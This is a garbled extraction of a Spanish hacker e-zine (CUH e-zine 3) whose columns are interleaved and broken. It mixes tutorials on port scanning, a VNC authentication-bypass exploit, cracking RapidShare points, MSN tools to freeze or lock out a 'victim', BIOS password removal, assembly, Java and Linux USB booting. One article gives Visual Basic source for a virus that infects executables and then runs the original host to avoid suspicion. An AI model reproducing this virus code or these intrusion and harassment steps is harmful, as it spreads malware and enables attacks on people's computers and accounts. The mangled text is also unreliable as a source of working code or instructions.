Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
Joejdf!
1 PORTADA & APENDICE
3 EXPLOTANDO PUERTOS
8 RAPIDSHARE PREMIUM
10 INYECCION A CIEGAS
13 UTILIDADES MSN
26 APERTURA DE CARPETAS
28 INTRODUCCION AL ASM II
33 MANUAL DE BATCH
38 PROGRAMACION C II
42 TRIANGULO DE PASCAL
44 PROGRAMAR EN ASP
53 TUTORIAL BOTONES
59 TUTO FIRMA
62 INSTALACION DE ASTERISK
66 MODDING GALLERY 3
!
Hacking Newbie
Explotando Puertos CUH e-zine 3ª Edicion
Los puertos mencionados arriba son los que utiliza el Este comando nos va a devolver el siguiente
programa VNC para poder conectarse remotamente resultado:
a la pc (en realidad solo el 5900).
Hacking Newbie
Explotando Puertos CUH e-zine 3ª Edicion
no se preocupen que eso se puede solucionar...
Para poder loguearse remotamente esta el exploit:
“realvnc_41_bypass” , con la ayuda de este exploit
se van a loguear sin necesidad de passwords.
-Con windows solamente utilizan el scanner para
VNC que mencione anteriormente y lograran
loguearse (si tiene clave utilizan el mismo exploit),
este scanner trae otras utilidades bastante buenas
Como vemos en la imagen nuestra victima cuenta que pueden hacer uso en caso de que no tenga esos
con muchos puertos abiertos que pueden ser puertos vulnerables.
tomados como vulnerabilidades pero lo que nos
interesa son las que ya he mencionado antes. Ayuda de Nmap
Some Common Scan Types (’*’ options require root privileges)
Bueno,bueno, ya mucha explicación ahora como * -sS TCP SYN stealth port scan (default if privileged (root))
hago para entrar en el pc ??? -sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
Tienes dos opciones para entrar a la pc, la fácil y la * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
todavía mas fácil ,xD . -sV Version scan probes open ports determining service & app
names/versions
-sR RPC scan (use with other scan types)
Some Common Options (none are required, most can be
combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: 1-1024,1080,6666,31337
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don’t ping hosts (needed to scan www.microsoft.com and
others)
* -Ddecoy_host1,decoy2[,…> Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane>
General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes
resolve>
-oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to
<logfile>
-iL <inputfile> Get targets from file; Use ‘-’ for stdin
* -S <your_IP>/-e <devicename> Specify source address or
network interface
–interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 ‘192.88-
90.*.*’
Saludos
[p3ll3]
IP Estática (si siempre es la misma) El IP Platinum es Le das en siguiente, aceptar, siguiente, siguiente,
especialmente para aquellos que no tienen IP siguiente, Install, finish.
Dinámica (por que cambiar la IP siendo esta es muy
fácil) o simplemente si quieres ser anónimo
navegando por la web.
1. Empezare por enseñar a cambiar tu IP Si todo salió bien, ya estará el soft listo para ser
(especial para IP) estática: usado, una vez que ejecutes el Soft te saldrá esta
ventana
Para esto Ocuparemos Hide IP Platinum
COMO CREAR UNA CUENTA que nos hagamos una Premium (de un AÑO) o
PREMIUM O EXTENDER UNA SI YA LA extender la que ya tenéis, hay que acumular 8000
TIENES EN RAPIDSHARE.COM Puntos (hartos verdad) pero con todos estos puntos
Perdón por que no lo había dado a te dan un año de cuenta Premium.
conocer directamente al foro ya que Lo primero que debemos hacer es bajarte este soft
quería algo bueno en mi primer de
artículo en la Cuh e-Zine (pero luego lo subo al http://rapidshare.com/files/84259641/Easy_Rapidsha
foro). re_Points_3.exe
Pass:chue-zine
O tal vez cuando leas esto el link este roto o tal vez
la versión vaya en otra más que la 3.0, bueno no te
aflijas, te vas al Google y pones la frase mágica que
a mí siempre me funciona “Easy Rapidshare Points
ES VERDAD!, como dice el titulo en las próximas (versión que buscas)+ crack” .
líneas te enseñare como crear una cuenta (sin gastar Una vez que lo descargas lo desempaquetas si
ningún dinero) en este servidor de gestión de bajaste mi archivo claro, ya que lo hice un .exe para
descarga y como todos saben es uno de los mejores que no necesites software adicionales para
y yo diría el mejor ya que es muy rápido (es porque descomprimirlo un ejemplo es WinRar (debería estar
tiene un acelerador de descarga muy bueno) y que el soft y un archivo de texto) si estás listo para
las mejores cosas están alli, como los SOs No libres, instalarlo ejecutas el .exe, si sabes Ingles Lees , pero
software de calidad (muchos), Música, películas y si no, No leas, pero dice algo sobre que cierres los
etc. y etc. programas que tienes y ejecución y bla, bla, lo
Pero lo malo de esto es cuando No tienes una cuenta mismo que dicen todos y que nunca hago caso, he
Premium ya que tienes que esperarte varias horas igual funcionan, apretar “Next” (siguiente).
para volver a bajarte un archivo (si es que bajaste En esta parte Tienes que llenarlo con algunos datos y
algo de 100 Mb, además es lo máximo que puedes donde dice serial tienes que poner uno de los tantos
descargar con cuenta free, por que cuando uno baja que hay en el archivo de texto que vienes con el
Free solo puede descargar algo igual o menor a 100 paquete que descargaste (¿recuerdas?).
Mb) pero si tienes una cuenta Premium bajas todo Siguiente, eliges donde quieres Instalarlo, siguiente,
quieras, tener varias descargas simultáneas, no siguiente.
esperar, sin virus, etc. Listo el programa está instalado, una vez instalado
Pero también lo puedes utilizar para compartir no lo ocuparemos al tiro.
archivos pesados con amigos, familiares, no es para Ahora tenemos que hacer un archivo que pese más
que siempre rompamos las reglas de copy- De 1 mega y menos de 2 Mb, lo comprimimos
restrinjido. (recomendado), si ya tienes una cuenta Premium
Aunque hay varis programas que tratan de evadir seguramente sabes subir archivos, entonces lo subes,
cambiando la IP (que es el método más que se usa) pero si no tienes una Cuenta Premium debes hacerte
lo mejor es tener una Cuenta Premium. una Free (libre), si no sabes hacerte una sigue
Ya basta de palabrería y vamos al grano. Para leyendo pero si sabes sáltate estas estrofas.
poder hacer nuestra cuenta necesitamos este
software Easy Rapidshare Points 3.0. Hacerse una cuenta Free en Rapidshare:
Este con este software haremos lo siguiente (yo hasta Abres una pág. web (con el Mozilla Firefox, Internet
esta parte iba muy emocionado por qué me Explorer, Opera, tu elije el que más te acomode)
imaginaba otra cosa pero sigue y el premio es Nos vamos a: http://rapidshare.com subes el archivo
grande) Miren lo que hace el “Easy Rapidshare que hemos creado anteriormente, para hacer esto de
Points 3.0” es ayudarte a hacer puntos, si bien sabes debes marcar donde dice examine, buscas el archivo
tú puedes ir subiendo cosas a esta web que hemos hecho antes y aceptar, luego selecciona
(Rapidshare.com) y llevar un registro de cuantas unload, esperas que se suba el archivo (el tiempo de
veces se ha descargado (pero tienes que tener espera varía según la velocidad de conexión que
cuenta Free o Premium) y te van dando un punto por tengas) .
cada vez que descarguen un archivo que tú has Una vez que se termine de subir te saldrán los datos;
subido (pero con la cuenta Premium o free). Y para cual es el link, si quieres enviarle el link a amigos,
Hacking Newbie
Cuenta Premium En RapidShare CUH e-zine 3ª Edicion
pero para que nos ágamos una cuenta Free tienes En 1 Minuto 1 punto
que irte al final de la pág. y rellenar con tus datos 30 Minutos 30 puntos
donde dice “user name” (pones un nombre de 1 Hora 60 puntos
usuario para registrarte ej. ChUtOReCaRgAdO, 1 día 1440 puntos
Email tienes que poner tu email verdadero y en
“password” una contraseña y aceptas. 1 Mes 43.200
Si esta todo correcto y te sale una pág. Como la de
a continuación, ya tienes tu cuenta Free, pero si no,
es que algo quedo mal, vuelve a escribir tu nombre
de usuario o contraseña.
http://www.ejemplo.org/pagina.php?id=467
http://www.ejemplo.org/pagina.asp?idpagina=abs(4
67)
http://download.msgpluslive.net/setup/MsgPlusLive-
422.exe
IPGET : Y listo tendremos el IP de el
http://www.msgpluslive.net/scripts/browse/index.php contacto =D
?act=view&id=108 Otros métodos
Si los links caducan con el tiempo www.softonic.com Bueno podría estar escribiendo
y www.google.com los encuentran fácilmente mucho tiempo ya que hay muchos
métodos, daré algunos ejemplos
Instalan todo, etc... Para ver el IP Get solo hay que ir IP CON HOTMAIL.
a los scrips de MSN situados acá:
Bueno simplemente hagan esto (está
basado para Windows live Hotmail
En el punta de los cuadraditos de colores clickean y en el antiguo es mas fácil aun, si
les sale eso alguien quiere saber como se hace
que busque en el todopoderoso
Google) abajo están los pasos a
seguir. En otros tipos de correo
como Yahoo, Gmail etc.… no creo
que sea muy diferente.
Link: http://foro.el-
hacker.com/index.php/topic,61858.0.html
Congelar MSN.
Hacking Newbie
Utilidades MSN CUH e-zine 3ª Edicion
Antes de todo yo les aviso que no estoy de acuerdo ¿Como lo hace?: Este programa se basa en que
con este tipo de actividades. Hotmail tiene un bloqueo, si uno intenta iniciar sesión
Muchos han escuchado del famoso programa muchas veces tu cuenta queda bloqueada de 1 a 5
congelador de MSN o tumba MSN ahora haré un horas, si tienes el programa encendido lo intentara
manual donde explicare su uso desde 0. siempre y hasta que no lo apagues el/ella no podrá
Empecemos por saber para que sirve, el programa entrar….
lo que hace es mandar una cantidad muy grande de NOTA: Si bloqueaste a alguien y después de 1 hora
iconos gestuales de MSN hasta que el uso de cpu entro de nuevo solo cierra el programa y inténtalo
llegue al 99% al llegar a eso el PC de la victima se de nuevo. Solamente se puede aplicar si la persona
queda pegado /colgado (como lo quieran llamar). esta desconectada (si esta conectada solo usa el
Bueno explicare paso a paso. congelador de mas arriba y en el momento que no
Paso 1: Desactivar los iconos gestuales de el MSN este usas el bloqueador y el no podrá ingresar mas
(aprietan en su nick >opciones>mensajes>desactivar o por ing. social dile que se salga 10 segundos)
iconos gestuales) Explicare paso a paso el uso del programa.
Importante: Es muy importante que hagas eso , si no
a ti también se te quedara pegada la PC , también Paso 1: Descargamos el programa de:
aviso que en el momento de tumbar el MSN de tu http://209.85.129.104/search?q=cache:NqV7fvJwIG8
victima tu PC se quedara “pegado “ por J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B
aproximadamente unos 40 segundos. 0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=cl
nk&cd=13&gl=cl&lr=lang_es
Paso 2: Abre solamente la ventana de tu victima y
abre el congelador de msn Paso 2: Lo abrimos y ponemos el mail de tu victima
(No puede estar conectada)
Troyanos: http://foro.el-
hacker.com/index.php/topic,85484.0.html
Exploits: http://foro.el-
hacker.com/index.php/board,85.0.html
¾ Server encriptado
¾ Presentación Power Point (.pps)
¾ PowerPoint Slide Show Convert
¾ Iexpress
¾ MiTeC IconFactory
¾ Resoucer Hacker
¾ eXeScope
CONOCIMIENTOS BÁSICOS DE
LOS EXPLOITS, Tipos de exploits:
VULNERABILIDADES, ETC...
Aquí nombrare algunos exploits (Los que me
Saludos, bueno aquí les voy a acuerdoXD) su nombre y definición, algunos
explicar conceptos básicos de los exploits y otras también, solo son vulnerabilidades o bugs:
cosas, ya que he visto que muchos users postean esto
lo otro, pues aquí les dejo ciertas cosas básicas! ☺ Desbordamiento del Buffer:
Bueno comencemos:
es un error de software que se produce cuando se
¿Qué es un exploit? copia una cantidad de datos sobre un área que no
es lo suficientemente grande para contenerlos,
Los exploits son unas de las muchas maneras de sobrescribiendo de esta manera otras zonas de
explotar alguna vulnerabilidad en un sistema, cuya memoria. Como consecuencia, se producirá una
seguridad puede ser saltada por este. excepción del acceso a memoria seguido de la
Al hablar de querer explotar un bug tienes que estar terminación del programa o, si se trata de un usuario
programado dicho exploit en el lenguaje obrando con malas intenciones, la explotación de
correspondiente y sin ningún error en sus líneas, una vulnerabilidad o agujero de seguridad.
existen formas diferentes de ejecutarlo ya sea local o Describiendo la técnica:
remota.
Exploit también viene de la palabra ingles, que Un desbordamiento de buffer ocurre cuando los
significa explotar, este en realidad es un código datos que se escriben en un buffer corrompen
malicioso. aquellos datos en direcciones de memoria
adyacentes a los destinados para el buffer, debido a
¿Qué es una Vulnerabilidad? una falta de validación de los datos de entrada
¿Que es un Proxy?
¿Qué es un Xploit?
'Establecemos la marca
Marca = "HOSTInfectado"
Muy bien, con esto ya tenemos infectado el fichero.
Pero ¿Que pasa si queremos que cuando el usuario
'Abrimos el fichero para saber si esta infectado
ejecute el fichero infectado, para no levantar
Open Host For Binary Access Read As #1
sospechas se ejecute también el ejecutable original?.
'Obtenemos el tamaño en bytes _
Para esto deberíamos crear otra función que cree un
del fichero
archivo temporal con los bits del fichero original, lo
BtsHost = Space(LOF(1))
ejecute y lo elimine. Así quedaría en memoria el virus
'Obtenemos todo su contenido.
y el fichero infectado.
Get #1, , BtsHost
Bueno, comencemos:
'Cerramos el archivo
Close #1
Function DesinfectarFichero(Pe As String)
Dim Host As String
'Miramos si el archivo ya esta infectado
If InStr(BtsHost, Marca) <> 0 Then
'Copiamos para poder abrirlo de forma _
'Si esta infectado salimos.
binaria.
Exit Function
FileCopy Pe, "C:\Temporal.exe"
Else
'Sino lo infectamos...
'Abrimos y extraemos los bits correspondientes _
al Host.
'Establecemos la variable aquí _
Open "C:\Temporal.exe" For Binary Access Read As
ya que si la poníamos al inicio _
#1
y no la usábamos, gastábamos _
'Obtenemos los bits del host, pero ATENCION _
espacio en memoria de gusto.
para esto debemos saber los bits que tenia _
Dim BtsVirus
nuestro virus al ser compilado, esto lo _
pueden obtener en las propiedades ;)
'Abrimos de forma binaria el virus
Host = Space(Len("C:\Temporal.exe") - 20382)
Open Virus For Binary Access Read As #2
'Obtenemos a Host.
'Obtenemos el tamaño (en bytes) usando _
Get #1, , Host
la función Len(Archivo)
'Cerramos
BtsVirus = Space(Len(Virus))
Close #1
'Obtenemos los bits...
Get #2, , BstVirus
'Ahora creamos otro fichero temporal para poner _
'Cerramos el archivo
el Host, no es necesario que exista anteriormente _
Close #2
ya que VB lo crea si no existe.
Open "C:\HostTemporal.exe" For Binary Access
'Abrimos el fichero para infectarlo
Write As #2
Open Host For Binary Access Write As #3
'Ponemos los bits del host
'Ponemos los bits del virus
Put #2, , Host
Put #3, , BtsVirus
'Cerramos
'Ponemos los bits del original
Close #2
Put #3, , BtsHost
'Ponemos la marca
'Ejecutamos el Fichero
Put #3, , Marca
Shell "C:\HostTemporal.exe"
'cerramos
Close #3
'Eliminamos los archivos temporales:
End If
Kill "C:\Temporal.exe"
End Function
Kill "C:\HostTemporal.exe"
Programacion VB
Infectar Ficheros Ejecutables CUH e-zine 3ª Edicion
End Function
'*Líneas agregadas*
'Verificamos si el tamaño del virus es _
el correcto o pesa mas. De pesar mas _
suponemos que se encuentra en un fichero _
infectado, así que llamamos a la función _
que "desinfecta"
If Len(Vx) > 20382 Then
Call DesinfectarFichero(Vx)
End If
'Establecemos a Pe como la ruta completa _ Les envío un cordial saludo a todos los lectores de la
del ejecutable a infectar. CUH e-zine y espero nos sigan apoyando como lo
Pe = "C:\HOST.exe" han hecho.
Atte. ANYD00M
'Ya tenemos lo que necesitamos, ahora _
solo debemos llamar a la función que _ [Articulo escrito formalmente para la CUH E-Zine #3
infectara el archivo, pasándole como _ de la comunidad El-Hacker.com]
parámetros la ruta del virus y la del _
archivo a infectar (Pe o "C:\HOST.exe"
Call InfectarFichero(Vx, Pe)
End Sub
Programación
Interceptar apertura carpetas CUH e-zine 3ª Edicion
Wss.RegWrite
“HKEY_CLASSES_ROOT\Directory\Shell\PROTECT
O\”, Yo & “ %1”
Ejemplos:
…
INC DX ;Incrementa DX en uno
…
DEC DWORD PTR [DI+102] ;Decrementa en uno el
valor del DWORD ubikdo en [DI+102] del segmento
actual
…
LEA ~ Load Effective Adress ~ Cargar TEST ~ Comprobar: Equivale a hacer un AND
dirección efectiva lógico, solo q no modifica registros, solo actualiza
Básicamente realiza la funcion de mov, calcula el las flags.
offset del operando origen, y lo almacena en el
destino 3- Manejando saltos condicionales:
En lenguajes de alto nivel, como el basic, se tienen
Sintaxis: lea (reg/pos),(reg/pos) comandos o sentencias que permiten tener un control
sobre las sentencias que se ejecutan en un
Ejemplo: lea ax,dx
Hacking Newbie
Introduccion Al ASM II CUH e-zine 3ª Edicion
programa, a estas les llamaremos "sentencias “ Æ tabla sacada de la red
condicionales", ya que toman en cuenta el
cumplimiento de una condición para seguir con la En la tabla podemos ver el código en hexadecimal,
siguiente; entre estos comandos podemos ver: el el mnemónico y su significado.
"if"(como principal); while; until; etc.
En asm también tenemos mnemonicos Weno, para tenerlo mas claro veremos un ejemplo:
condicionales, los cuales cada uno de ellos
representa una condición especifica. Como principal …
ejemplo tenemos a los saltos. Estos saltos estan MOV DX,00 ;dx==00
condicionados por los valores que poseen las "flags" INI:
(registros especiales que vimos en el 1er tuto). Como INC DX ;incrementa el valor dx en 1Æ dx+1
ya hemos vistos, el mnemonico "jmp" ~ jump ~ CMP DX,05 ;compara dx con 05
saltar.. se utiliza para saltar a una posición JE FOK ;si dx=05 salta a la etiqueta FOK
especifica de memoria determinada ya sea por una JMP INI ;sino salta a la etiqueta INI
etiqueta(en leguajes de macro como en el "TASM") o FOK:
por una dirección de offset. Técnicamente esto lo MOV AH,4C ;ah==4C
hace incrementando el valor de IP (Puntero de …
Instrucción). Equivale a un GOTO. Lo que akabamos de ver es un simple bucle que
establece el valor de dx en 00 luego cuando entra en
Ejemplos: la etiqueta “ini”, se incrementa el valor de dx, o sea
… que, si antes de entrar en la etiqueta dx era 00
JMP 0046D24C ;salta a CS:0046D24C. después del “INC DX”, dx tomaba el valor de 01 y así
… sucesivamente mientras se mantuviera en el bucle,
JMP etq1 ;salta a la etiqueta "etq1" dentro del luego de que el valor de dx se incrementa, este se
macro. compara con el valor “05”, si la flan “equal” se
…. activa, entonces salta a la etiqueta “FOK”, sino
Hay varias derivaciones según la activación de vuelva a “INI”.
diferentes flags. Así las derivaciones son:
“ Esto es algo que veremos muy frecuente en
Hexadecimal Assembler Significa ingeniería inversa.
75 o 0F85 Jne Salta si no es equivalente
3.1-Saltos cortos, cercanos y largos.
74 o 0F84 Je Salta si es equivalente
EB Jmp Salta directamente a . . . Hay veces que necesitamos indicar que tipo
( No OPeration ) Sin de salto realizaremos dependiendo de tan lejos
90 Nop saltaremos.
operación
77 o 0F87 Ja Salta si esta sobre
JMP SHORT ~ Salto corto: Se realiza si vamos a
OF86 Jna Salta si no esta sobre saltar a una dirección comprendida entre lo q puede
0F83 Jae Salta si esta sobre o igual dos bytes (-128 a +127 antes o después de IP actual).
Salta si no esta sobre o …
0F82 Jnae 00402207 JMP SHORT 402100
igual
0F82 Jb Salta si es inferior …
0F83 Jnb Salta si no es inferior JMP NEAR ~ Salto cercano: Se realiza si vamos a
Salta si esta debajo o saltar a una dirección comprendida entre lo q puede
0F86 Jbe
igual un byte (-32768 a +32767 antes o después de IP
Salta si no esta debajo o actual).
0F87 Jnbe
igual …
0F8F Jg Salta si es mayor 00402207 JMP NEAR 404010
…
0F8E Jng Salta si no es mayor
0F8D Jge Salta si es mayor o igual Un salto largo es ya cuando se tiene como
Salta si no es mayor o distancia el contenido de 4 bytes. Este tipo de saltos
0F8C Jnge
igual se ven cuando un programa llama a una función de
0F8C Jl Salta si es menor un modulo.
Por ejemplo para saltar a USER32.GetDlgItemTextA
0F8D Jnl Salta si no es menor
desde el app.00401171:
0F8E Jle Salta si es menor o igual
Salta si no es menor o ------------------------------------------app.exe----------
0F8F Jnle
igual …
Hacking Newbie
Introduccion Al ASM II CUH e-zine 3ª Edicion
00401171 JMP DWORD PTR PUSH AH ;AH a stack
DS:[<&USER32.GetDlgItemTextA>] PUSH DH ;DH a stack
… PUSH AL ;AL a stack
--------------------------------------------------------------- POP DL ;recordemos q el ultimo valor en entrar a la
pila fue el de AL, y AL vale 02 asiq DL=02
Algo que tenemos que tomar en cuenta es …
que las especificaciones de corto, cercano y lejano,
también debemos especificarlas en las demás Por si acaso:
derivaciones de saltos (los condicionales), claro, PUSH X ~ Meter: Mete el valor de el registro X en la
cuando sea necesario. pila
POP Y ~ Sacar: Saca y guarda en el registro Y el
4- Instrucciones PUSH y POP. La PILA o STACK ultimo valor introducido en la pila.
Para empezar con esto, tengamos este La pila es como un almacén donde se
diagrama en mente: guardan valores de los registros. Recordemos que la
dirección de la pila esta especificada por los
PUSH Y = mete el valor de Y en el almacén registros:
POP X = saca y guarda, el ultimo valor metido en el SS:SP (Stack Segment:Stack Pointer ~ Segmento de la
almacén, en X pila:Puntero actual de la pila).
5- Instrucción LOOP
Almacén = Weno esencialmente, esta instrucción la usaremos a
| | la hora de crear bucles y no qeremos meternos con
| | mov-inc-cmp-jne. Básicamente lo que hace LOOP es
| | comparar CX con 0 si CX=0 entoncs continua con la
|_ _| siguiente instrucción si no vuelve a su parámetro.
LOOP decrementa el valor de CX cada ves que IP se
A=1 ubica en el.
B=2
C=3 -Su sintaxis es:
D=0
LOOP PARAM
Æ PUSH A
| | -- donde PARAM es la instrucción a la cual volvera IP
| | si CX no es igual a 0
| |
| _1_ | Ejemplo:
Æ PUSH C …
| | MOV CX,05h
| | INI:
| 3| LOOP INI
| _1_ | FOK:
Æ PUSH B …
| |
| 2| 6- Instrucciones CALL Y RET:
| 3|
| _1_ | La orden CALL equivale a un CALL en batch.
Æ POP D Y RET equivale a GOTO :EOF en batch. Su sintaxis
es como la del JMP, se permiten etiquetas, registros,
..... ... direcciones de memoria. CALL lo que hace es
D=2 .: | : | | | introducir IP+1 en la pila, o sea la instrucción que
| 2| Æ | | sigue al CALL, y salta a la dirección que se le indica,
| 3| | 3| RET toma el valor que introduce el CALL en la pila, y
| _1_ | | _1_ | salta a el.
Código:
ImprimeTrianguloPascal(exponente);
2 2
1,2,1 porque 1a+ 2ab + 1b .
}
public static void ImprimeTrianguloPascal(int
Los valores que se usan del triangulo son los de la exponente)throws IOException{
ultima linea ya que se van imprimiendo todos los
valores desde el exponente = 0 hasta el exponente =
n ; donde n va a ser igual al exponente que deseen. int indice = 0,contador;
combinatoria =
Se construyeron y comercializaron varios ejemplares
factorial(exponente)/(factorial(k)*factorial(exponente-
de la máquina que estaba pensada para cálculos
k));
con la moneda francesa. Esto hace que Pascal fuera
System.out.print(combinatoria+" "); la segunda persona tras Schickard en inventar una
calculadora mecánica.
}
"Si Dios no existe, uno no perderá nada creyendo en
él, mientras que si él existe, uno perderá todo por no
creer".
public static int factorial(int exponente)throws
IOException{ Blaise Pascal
int factorial = 1 ;
Programacion
Programar en ASP CUH e-zine 3ª Edicion
Créditos:
Editado por rOnNyLdInHo
Para cosultas, comentarios o sugerencias, serán respetuosamente bien recibidas a ronnyldinho@hotmail.com
Comunidad Underground Hispana, foro el-hacker.com
Linux
Pendrive Usb De Arranque CUH e-zine 3ª Edicion
Paso 1: Creamos el sistema de archivos. Tras haberlo conectado de nuevo y después de haber
Algunos pendrives USB sólo arrancan si se esperado muchos segundos (muchos, muchos,
particionan de cierta manera, y algunas BIOS puedes irte a tomar un café :>, je je es porque
aparentemente buscan un cierto tipo de cabecera de algunas unidades son muy lentas en la detección de
partición y sistema de archivos, o renunciarán a la tabla de particiones).
arrancar. He visto casos en los que una placa sólo
quería arrancar desde un pendrive USB sin Si la unidad ya aparece como un nombre de nuevo
particionar, y otros en los que se requerían tanto el dispositivo (es decir, sdb en lugar de sda),
flag de un sector de arranque DOS como el de la probablemente hemos olvidado desmontar el sistema
partición de arranque. de archivos antes de desconectarla. Podemos
En primer lugar podemos probar con una tabla de hacerlo ahora, no obstante, es probable que no
particiones por defecto y un sistemas de archivos exista ya, tras la repartición de la unidad.
más o menos sin modificar.
La mayoría de los pendrives USB recientes tienen Para los pendrives USB sin partición (si el método de
una especie de tabla de particiones válida en la que arranque particionado falla), nos saltamos el paso
la primaera partición primaria está formateada en de particionado y tecleamos el comando mkdosfs
FAT16 o FAT32. En este caso debemos asegurarnos de sobre el pendrive USB entero.
que la particón es arrancable.
Para una partición de un pendrive USB que aparezca Esa, amigos míos, fue la parte más difícil, ahora lo
como /dev/sda1, el comando para configurar el flag que viene es sumamente sencillo, similar a cambiar
como “arrancable” sería: de Windows XP a Ubuntu Feisty :)
sfdisk -A1 /dev/ sda
Paso2: Instalar el syslinux como cargador del kernel
Para reparticionar la unidad USB podemos usar las Lo que isolinux hace para un CD/DVD, syslinux lo
mismas herramientas que usamos para un disco duro hace para las particiones o discos formateados en
normal (es decir: qtparted o, mi favorito y el favorito DOS.
de muchos: fdisk o sfdisk). Para unidades particionadas:
El tipo de partición para un sistema de archivo syslinux /dev/sda1
DOS/FAT (el menos problemático para el arranque
desde una unidad USB) sería “6” para FAT16 y “b”
para FAT32. Para unidades no particionadas:
Usamos FAT16 para particiones menores de 2GB y syslinux /dev/sda
FAT32 si son mayores. Véase arriba el comando de
sfdisk para fijar el flag de la partición como
arrancable (o 'activo'), lo cual es independiente del aquí debemos de asegurarnos que estamos
sistema de archivo de las particiones o del utilizando el nombre correcto de dispositivo para
contenido. nuestro sistema.
El comando de mkdosfs para dar formato a una
partición FAT16 como /dev/sda1 es: Si usamos un pendrive USB particionado, podemos
configurar (o si prefieres resetear) el sector de
mkdosfs -F16 /dev/sda1
arranque adecuadamente. Aunque, no es necesario
hacer esto. Puede que primero queramos ver si el
Mientras que para FAT32, sería: arranque funciona sin cambiar el MBR.
mkdosfs -F32 /dev/sda1
Instalamos un sector de arranque syslinux para
unidades particionadas:
Aunque yo creo que no, pero aún así lo voy a
decir(escribir en este caso), es obvio que a este ms-sys -s devicename
punto perderemos toda la información que esté en la
partición, por lo tanto debemos hacer una copia de Usamos /dev/sda si /dev/sda1 es la partición
Linux
Pendrive Usb De Arranque CUH e-zine 3ª Edicion
FAT16/FAT32 del pendrive USB. Debemos vigilar que rsync -Hav –progress
el nombre del dispositivo sea correcto. /cdrom/KNOPPIX U
/media/usbkey/KNOPPIX
Paso3: Copiamos los archivos de arranque y la
información Una vez hecho esto, tenemos que desmontar el
En este paso, tenemos que montar el pendrive USB dispositivo para poder sincronizar el búfer, de datos
(o partición, si usamos el modo particionado) en pendientes a disco y cerrar la sesión. No se
modo sensible a mayúsculas: sorprenda si este comando tarda bastante tiempo en
ejecutarse. Puede haber muchos datos sin escribir en
memoria debido a la fabulosa caché del búfer
mkdir -p /media/usbkey
dinámico de bloques de Linux, que hace parecer que
mount -t vfat -o rw.umask=
las escrituras en disco son más rápidas de lo que
000.shortname=winnt
realmente son.
/dev/sda1 /media/usbkey
umount /media/usbkey
A continuación deberíamos cambiar /dev/sda1 a la
partición en cuestión, y entonces saltarnos el número Paso4: Configurar la BIOS de la PC
de la partición en caso de usar todo el pendrive. Una placa capaz de arrancar desde USB tiene al
menos dos modos de arranque por USB:
Copiamos ahora los archivos de arranque desde el 1- Arranque desde Disco Duro USB. (Unidad USB
CD o DVD de tu Distro* particionada)
2- Arranque desde unidad ZIP USB. (Unidad USB sin
*Como lo dijo mi amigo LTSmash en la edición particionar)
pasada, una distro es una distribución de cualquier Para nuestro disco duro la opción DISCO DURO
SO basado en GNU/Linux. En mi caso, para hacer sería la correcta pero todo depende de lo que
este manual yo instalé Knoppix, pero se puede hagamos en el paso 1.
realizar en cualquier distribución de Linux sin ningún Créditos.
problema. Nada más en los códigos que presentaré Manual editado por rOnNyLdInHo.
a partir de aquí, cambian el nombre KNOPPIX por Revista Linux Magazine por la oportunidad de
sus distro, por ejemplo: Ubuntu, SuSe, Lindows, etc. editarlo.
Klaus Knopper fundador de Knoppix por la ayuda.
Vamos a suponer que el CD se monta en /cdrom en Este manual ha sido editado únicamente para la
una sesión Live de Knoppix, aunque en realidad este revsta CUH e-zine del foro: http://foro.el-
paso se puede realizar en cualquier distro de Linux. hacker.com
cp /cdrom/boot/isolinux/*
/media/usbkey
mv /media/usbkey/isolinux.cfg
/media/usbkey/syslinux.cfg
http://www.cgsecurity.org/wiki/CmosPwd
Para limpiar el contenido habría 1ero q apagar la
pc, desconectarla d la corriente, cambiar el jumper a
trabaja con estos tipos d chips d bios:
la posición 2/3 y esperar 30 segs... x las dudas y
para acelerar el proceso es bueno presionar el
* ACER/IBM BIOS
botón d encendido con la pc desconectada para q
* AMI BIOS
descargue la corriente q queda almacenada en los
* AMI WinBIOS 2.5
capacitores.
* Award 4.5x/4.6x/6.0
* Compaq (1992)
Esta corriente es la responsable d q cuando sacamos
* Compaq (New version)
la pila no c pierda la configuración hasta después d
* IBM (PS/2, Activa, Thinkpad)
1 buen rato. también c puede utilizar este método si
* Packard Bell
no c encuentra el jumper (algunos mothers no lo
* Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04,
traían a unq ahora creo q ya viene en todos)... sacar
1.10 A03, 4.05 rev 1.02.943, 4.06 rev 1.13.1107
la pila y esperar 1 buen rato (hasta 20/30 mins)... o
* Phoenix 4 release 6 (User)
presionar el encendido como decíamos antes o
* Gateway Solo - Phoenix 4.0 release 6
mejor aun hacer 1 pequeño corto entre los contactos
* Toshiba
del porta-batería, esto descarga instantáneamente
* Zenith AMI
los capacitores y borra todo.
D cualquiera d estos nos da en texto limpio la pass
Estos métodos sirven siempre y cuando c tenga
sin + q correrlo. en equipos muy nuevos es posible q
acceso a abrir la pc y meter mano adentro pero hay
no funcione pero x lo gral da buenos resultados...
casos en los q x 1 razón u otra esto no es posible,
otra opción q tiene para los + experimentados es
para esos casos tenemos herramientas d soft q
hacer 1 dump del contenido del cmos para después
pueden tanto borrar la pass como también algo
dejarlo como estaba. o sea q podemos copiar el
muchísimo mejor... decirnos cual es... je... aunq no c
contenido, después borrar el CMOS para poder
entusiasmen... esto ultimo no funciona con todos los
acceder y 1 vez q tenemos acceso volver a grabarlo
mothers pero algo es algo...
como estaba antes... esto c hace con el modificador
"/d".
vamos a empezar x lo mismo q antes... borrarla.
By |_ocutus
‐ asterisk-addons-1.2.6.tar.gz (adicional)
Si esta deshabilitada el comando “yum” se debe # for i in * ; do tar –zxvf $i; done;
buscar uno a uno cada paquete que falta instalar se
lo puede hacer en esta web:
http://rpm.pbone.net/
Luego de esto se aplasta enter y todos los archives
